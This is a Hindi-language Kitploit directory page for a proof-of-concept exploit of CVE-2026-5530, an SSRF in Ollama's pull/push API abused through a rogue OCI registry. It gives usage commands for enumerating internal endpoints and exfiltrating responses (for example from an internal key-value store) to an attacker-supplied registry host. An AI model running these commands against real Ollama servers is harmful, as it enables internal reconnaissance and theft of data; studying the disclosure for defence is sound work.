Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-5530 — CVE-2026-5530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ollama के Pull/Push API में एक SSRF है, जो एक दुष्ट OCI रजिस्ट्री के माध्यम से आंतरिक एंडपॉइंट एन्यूमरेशन और पूर्ण प्रतिक्रिया एक्सफिल्ट्रेशन को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/davidrxchester/cve-2026-5530
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करना
GitHubdavidrxchester/cve-2026-5530

CVE-2026-5530

CVE-2026-5530 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Ollama के Pull/Push API में एक SSRF है, जो एक दुष्ट OCI रजिस्ट्री के माध्यम से आंतरिक एंडपॉइंट एन्यूमरेशन और पूर्ण प्रतिक्रिया एक्सफिल्ट्रेशन को सक्षम बनाता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-5530

OCI रजिस्ट्री रीडायरेक्ट के माध्यम से Ollama SSRF, पूर्ण प्रतिक्रिया निष्कासन (exfiltration) के साथ।

विवरण (Writeup): https://davidrochester.com/posts/cve-2026-5530

प्रकटीकरण (Disclosure)

Ollama से कई बार संपर्क किया गया, लेकिन कोई प्रतिक्रिया नहीं मिली।

उपयोग (Usage)

तीन मोड: enum, exfil, और probe।

Enum

Ollama होस्ट से पहुंच योग्य लाइव आंतरिक एंडपॉइंट्स खोजता है।

root@kitploit:~
python3 poc.py targets.txt --registry-host <your-ip>

Exfil

जब आप प्रतिक्रिया का आकार जानते हों, तो SSRF प्रतिक्रियाओं को निष्कासित (exfiltrate) करता है।

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <your-ip>

Probe

प्रतिक्रिया के आकार के लिए स्वचालित रूप से बाइनरी खोज करता है, फिर निष्कासित करता है।

root@kitploit:~
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <your-ip>

विकल्प (Options)

root@kitploit:~
target              URL या URL की फ़ाइल (प्रति पंक्ति एक, टिप्पणियों के लिए #)
-p, --port          दुष्ट रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 9999)
--exfil-port        निष्कासन रजिस्ट्री पोर्ट (डिफ़ॉल्ट: 10000)
--exfil             निष्कासन मोड, --size की आवश्यकता है
--probe             आकार के लिए बाइनरी खोज, फिर निष्कासन
--size              Content-Length (--exfil के साथ आवश्यक)
--registry-host     आपका हमलावर IP/होस्टनाम जिसे Ollama पहुंच सकता है
--ollama            Ollama API URL (डिफ़ॉल्ट: http://127.0.0.1:11434)
टूल डाउनलोड करें